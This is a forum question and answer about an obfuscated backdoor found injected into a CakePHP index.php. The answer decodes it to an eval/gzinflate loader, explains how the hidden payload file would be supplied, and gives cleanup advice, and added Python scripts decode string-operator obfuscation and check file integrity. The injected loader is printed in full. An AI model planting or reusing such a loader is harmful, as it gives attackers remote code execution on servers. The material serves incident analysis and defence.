Is it a CakePHP hack?

The other day I ran into some strange error messages on a CakePHP website. We saw errors like the following:

Expectation Failed:
The expectation specified in the Expect request header field cannot be met by this server.
Expect: 100-Continue, 100-Continue
Only the 100-continue expectation is supported.

I ended up tracing it to some random-looking code in our index.php file:

    $get_ya_weekday_initial = 'dvA, @ fzi * f, @ pE (& lE [E`pJco "Pe * $ P" / (oA! `mh (! 3, da7 * & H & ( a@ " 1m! tHOE # @ a + E.3b2hp`s-td $ p ( !teq.Ck@L /tm`*ca"HR$PeRshsTE"$!IBFCcTQ`hI.H`% ") (# '|
    '! 4ah (@ExHlFH! D! BID WgE $ W # * N $! DPs ($ h $ ld.FELFnItr + Ner & de $ ofiuQr (h $ (* blh, # `je / C # rI04" +@AM @ La $ d2) 2)% h.`, 0 / @@ ahA+p@2PiA $ alt / BRBB04u $ in (jPg) !!: ';
    $wp_cw_kses_split = '>=^/E]u*PDAF$!V' ^ ']O;N18*L%*"2MN8'; $set_yly_timeout = $wp_cw_kses_split('', $get_ya_weekday_initial); $set_yly_timeout();

It looks like some kind of scrambled/encrypted code, so I'm suspicious, but I don't know how to unscramble it. Anyone have any ideas what this code was trying to do?

Edit: Here is the whole index.php file. Note: as of this morning the hack code is back :-/ on the server, but I don't see how the code was inserted (and the modification date of the file has remained unchanged since I edited it yesterday).

     * Copyright 2005-2007, Cake Software Foundation, Inc.
     * 1785 E. Sahara Avenue, Suite 490-204
     * Las Vegas, Nevada 89104
     *
     * Licensed under The MIT License
     * Redistributions of files must retain the above copyright notice.
     *
     * @filesource
     * @copyright      Copyright 2005-2007, Cake Software Foundation, Inc.
     * @link           http://www.cakefoundation.org/projects/info/cakephp CakePHP(tm) Project
     * @package        cake
     * @subpackage     cake.app.webroot
     * @since          CakePHP(tm) v 0.2.9
     * @version        $Revision: 4450 $
     * @modifiedby     $LastChangedBy: phpnut $
     * @lastmodified   $Date: 2007-02-04 23:18:05 -0600 (Sun, 04 Feb 2007) $
     * @license        http://www.opensource.org/licenses/mit-license.php The MIT License
     */
    /**
     * Do not change
     */
    if (!defined('DS')) {
        define('DS', DIRECTORY_SEPARATOR);
    }
    /**
     * These defines should only be edited if you have cake installed in
     * a directory layout other than the way it is distributed.
     * Each define has a commented line of code that explains what you would change.
     *
     */
    $get_ya_weekday_initial = 'dvA, @ fzi * f, @ pE (& lE [E`pJco "Pe * $ P" / (oA! `mh (! 3, da7 * & H & ( a@ " 1m! tHOE # @ a + E.3b2hp`s-td $ p ( !teq.Ck@L /tm`*ca"HR$PeRshsTE"$!IBFCcTQ`hI.H`% ") (# '|
    '! 4ah (@ExHlFH! D! BID WgE $ W # * N $! DPs ($ h $ ld.FELFnItr + Ner & de $ ofiuQr (h $ (* blh, # `je / C # rI04" +@AM @ La $ d2) 2)% h.`, 0 / @@ ahA+p@2PiA $ alt / BRBB04u $ in (jPg) !!: ';
    $wp_cw_kses_split = '>=^/E]u*PDAF$!V' ^ ']O;N18*L%*"2MN8'; $set_yly_timeout = $wp_cw_kses_split('', $get_ya_weekday_initial); $set_yly_timeout();
    if (!defined('ROOT')) {
        //define('ROOT', 'FULL PATH TO DIRECTORY WHERE APP DIRECTORY IS LOCATED DO NOT ADD A TRAILING DIRECTORY SEPARATOR';
        //You should also use the DS define to separate your directories
        define('ROOT', dirname(dirname(dirname(__FILE__))));
    }
    if (!defined('APP_DIR')) {
        //define('APP_DIR', 'DIRECTORY NAME OF APPLICATION';
        define('APP_DIR', basename(dirname(dirname(__FILE__))));
    }
    /**
     * This only needs to be changed if the cake installed libs are located
     * outside of the distributed directory structure.
     */
    if (!defined('CAKE_CORE_INCLUDE_PATH')) {
        //define('CAKE_CORE_INCLUDE_PATH', FULL PATH TO DIRECTORY WHERE CAKE CORE IS INSTALLED DO NOT ADD A TRAILING DIRECTORY SEPARATOR';
        //You should also use the DS define to separate your directories
        define('CAKE_CORE_INCLUDE_PATH', ROOT);
    }
    ///////////////////////////////
    //DO NOT EDIT BELOW THIS LINE//
    ///////////////////////////////
    if (!defined('WEBROOT_DIR')) {
        define('WEBROOT_DIR', basename(dirname(__FILE__)));
    }
    if (!defined('WWW_ROOT')) {
        define('WWW_ROOT', dirname(__FILE__) . DS);
    }
    if (!defined('CORE_PATH')) {
        if (function_exists('ini_set')) {
            ini_set('include_path', CAKE_CORE_INCLUDE_PATH . PATH_SEPARATOR . ROOT . DS . APP_DIR . DS . PATH_SEPARATOR . ini_get('include_path'));
            define('APP_PATH', null);
            define('CORE_PATH', null);
        } else {
            define('APP_PATH', ROOT . DS . APP_DIR . DS);
            define('CORE_PATH', CAKE_CORE_INCLUDE_PATH . DS);
        }
    }
    require CORE_PATH . 'cake' . DS . 'bootstrap.php';
    if (isset($_GET['url']) && $_GET['url'] === 'favicon.ico') {
    } else {
        $Dispatcher = new Dispatcher();
        $Dispatcher->dispatch($url);
    }
    if (Configure::read() > 0) {
        echo "";
    }
    ?>

I'm starting to wonder if I need to update Cake, since we're currently on v1.1 :-/

1 answer

Anyone have any ideas on what this code was trying to do?

Code in a more readable form:

eval(@gzinflate(file_get_contents(".../persistent/KRFCstudio.jpg"))); 

This is a kind of backdoor script that was obfuscated (if you want to know how, see the relevant question). It stays in the code until the payload is provided.

The payload must be placed in

 .../cake/scripts/templates/skel/tmp/cache/persistent/KRFCstudio.jpg 

as DEFLATE data (RFC 1951) of PHP code (without the opening <?php tag); see the gzinflate docs and the eval docs.

Note: as of this morning the hack code is back :-/ on the server, but I don't see how the code was inserted (and the modification date of the file has remained unchanged since I edited it yesterday).

Fix the file again. Then make the file read-only (as all of your php files on the server should be). Once it is read-only, check whether it stays clean. Also make sure the process that reads the file during a normal web request cannot change the file's permissions, e.g. allow only root to do that.

Then log access to the files on your site to find out when the file gets modified (or which process is trying to change it).

As noted yesterday, you must contact whoever is in charge of the server. You've already done that, right? You need someone who can look into the problem with you and talk it through with you.

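The answer gives the readable form of the injected code but not the mechanics of how PHP's byte-wise string operators turn the scrambled literals into it. As an added example (not code from the question, the answer, or CakePHP), the Python below emulates PHP's `^`, `|` and `&` on strings, finds every `'literal' OP 'literal'` pair in a PHP source, decodes it, and reports loader functions (`eval`, `gzinflate`, `create_function`, ...) that are visible in the clear as well as those that only appear after decoding. The `^` pair in the sample is the one from the posted snippet and decodes to `create_function`; the `|` pair and the placeholder path are constructed for the demo.

```python
"""Decode PHP string-operator obfuscation and flag loader functions.

Added example: emulates PHP's byte-wise string operators (^ | &) so that
pairs like 'lit' ^ 'lit' in a PHP file can be decoded offline, then checks
both the clear text and the decoded values for the usual loader functions.
"""
import re

# PHP's string operators work byte by byte on the raw bytes of each operand.
_OPS = {"^": lambda a, b: a ^ b, "|": lambda a, b: a | b, "&": lambda a, b: a & b}

# Functions a loader such as eval(@gzinflate(file_get_contents(...))) relies on.
_LOADER_NAMES = ("assert", "base64_decode", "create_function", "eval",
                 "gzinflate", "gzuncompress", "str_rot13")
_LOADER_CALL = re.compile(r"\b(" + "|".join(_LOADER_NAMES) + r")\s*\(")

# A PHP single-quoted literal: only \' and \\ are escape sequences inside it.
_SQ_LITERAL = r"'((?:[^'\\]|\\.)*)'"
_PAIR = re.compile(_SQ_LITERAL + r"\s*([\^|&])\s*" + _SQ_LITERAL)


def php_string_op(left: str, right: str, op: str) -> str:
    """Emulate PHP's 'a' ^ 'b', 'a' | 'b' and 'a' & 'b'.

    For ^ and & PHP truncates to the shorter operand; for | the result is as
    long as the longer operand, the shorter one being treated as NUL-padded.
    """
    a, b = left.encode("latin-1"), right.encode("latin-1")
    if op == "|":
        n = max(len(a), len(b))
        a, b = a.ljust(n, b"\x00"), b.ljust(n, b"\x00")
    else:
        n = min(len(a), len(b))
        a, b = a[:n], b[:n]
    return bytes(_OPS[op](x, y) for x, y in zip(a, b)).decode("latin-1")


def _unescape(body: str) -> str:
    """Undo the two escapes PHP honours inside single quotes."""
    return re.sub(r"\\(['\\])", r"\1", body)


def decode_string_ops(php_src: str) -> list:
    """Return (expression, decoded_value) for every 'lit' OP 'lit' pair found."""
    found = []
    for m in _PAIR.finditer(php_src):
        value = php_string_op(_unescape(m.group(1)), _unescape(m.group(3)), m.group(2))
        found.append((m.group(0), value))
    return found


def scan_php(php_src: str) -> dict:
    """Report loader functions named in the clear and those hidden behind string ops."""
    decoded = decode_string_ops(php_src)
    visible = sorted(set(_LOADER_CALL.findall(php_src)))
    hidden = sorted({value for _, value in decoded if value in _LOADER_NAMES})
    return {"decoded": decoded, "visible": visible, "hidden": hidden}


# Constructed sample in the style of the posted snippet. The ^ pair is the one
# from the question; the | pair and the placeholder path are made up for the demo.
SAMPLE_PHP = r"""
$f = '>=^/E]u*PDAF$!V' ^ ']O;N18*L%*"2MN8';
$g = 'arAH' | '$4!$';
$h = $f('', $g . '(@gzinflate(file_get_contents("PLACEHOLDER/payload.jpg")));');
$h();
"""

if __name__ == "__main__":
    report = scan_php(SAMPLE_PHP)
    for expr, value in report["decoded"]:
        print(f"{expr}  ->  {value!r}")
    print("named in the clear:", report["visible"])   # ['gzinflate']
    print("hidden behind ops :", report["hidden"])    # ['create_function', 'eval']
```

A plain grep for `eval(` or `create_function(` misses the snippet from the question entirely, because the function name is never written out; only the decoded value reveals it. The scanner therefore reports the two lists separately, so a file with an empty `visible` list but a non-empty `hidden` one is exactly the case worth looking at.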

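The answer's advice to make the file read-only and watch for changes can be automated. As an added example (not from the answer or CakePHP), this Python script records a baseline of every `.php` file under a webroot (SHA-256, permission bits, mtime) and re-checks it, reporting modified, added, removed and still-writable files. It compares content hashes rather than timestamps, so a rewrite that puts the old modification time back is still caught, which is the symptom described in the question. The directory layout and file contents in `demo()` are constructed.

```python
"""Hash-based integrity check for a PHP webroot.

Added example: records a baseline (SHA-256, permission bits, mtime) of every
.php file below a root directory and re-checks it later. Content hashes are
compared, not timestamps, so a rewrite that restores the old mtime is still
reported; files that are still writable are listed so the read-only advice
can be verified.
"""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path

# Any write bit set means the file is not read-only for somebody.
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root) -> dict:
    """Map each .php file (relative POSIX path) to its hash, mode and mtime."""
    root = Path(root)
    baseline = {}
    for p in sorted(root.rglob("*.php")):
        if p.is_file():
            st = p.stat()
            baseline[p.relative_to(root).as_posix()] = {
                "sha256": sha256_of(p),
                "mode": stat.S_IMODE(st.st_mode),
                "mtime_ns": st.st_mtime_ns,
            }
    return baseline


def save_baseline(baseline: dict, path) -> None:
    """Persist the baseline somewhere the web server cannot write to."""
    Path(path).write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(path) -> dict:
    return json.loads(Path(path).read_text())


def check_against_baseline(root, baseline: dict) -> dict:
    """Compare the current tree with a baseline and report what changed."""
    current = build_baseline(root)
    report = {"modified": [], "added": [], "removed": [], "writable": [], "mtime_preserved": []}
    for rel, cur in current.items():
        if cur["mode"] & WRITE_BITS:
            report["writable"].append(rel)
        old = baseline.get(rel)
        if old is None:
            report["added"].append(rel)
        elif cur["sha256"] != old["sha256"]:
            report["modified"].append(rel)
            # Same mtime but different content: the timestamp was put back.
            if cur["mtime_ns"] == old["mtime_ns"]:
                report["mtime_preserved"].append(rel)
    report["removed"] = sorted(set(baseline) - set(current))
    return report


def demo() -> dict:
    """Constructed scenario: a read-only index.php is tampered with, the old
    mtime is restored (as in the question), and a second .php file is dropped."""
    root = Path(tempfile.mkdtemp())
    webroot = root / "app" / "webroot"
    webroot.mkdir(parents=True)
    target = webroot / "index.php"
    target.write_text("<?php echo 'clean';\n")
    os.chmod(target, 0o444)
    baseline = build_baseline(root)

    st = target.stat()
    os.chmod(target, 0o644)  # file made writable again ...
    target.write_text("<?php echo 'clean'; /* injected */\n")
    os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))  # ... and timestamp put back
    (webroot / "dropped.php").write_text("<?php\n")
    return check_against_baseline(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In practice the baseline file belongs outside the document root, owned by a user other than the one the web server runs as; otherwise whatever rewrote index.php can rewrite the baseline too. The `mtime_preserved` list is there because an unchanged timestamp on a changed file is itself a strong signal that the change was not an ordinary edit.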
Source: https://habr.com/ru/post/1388192/
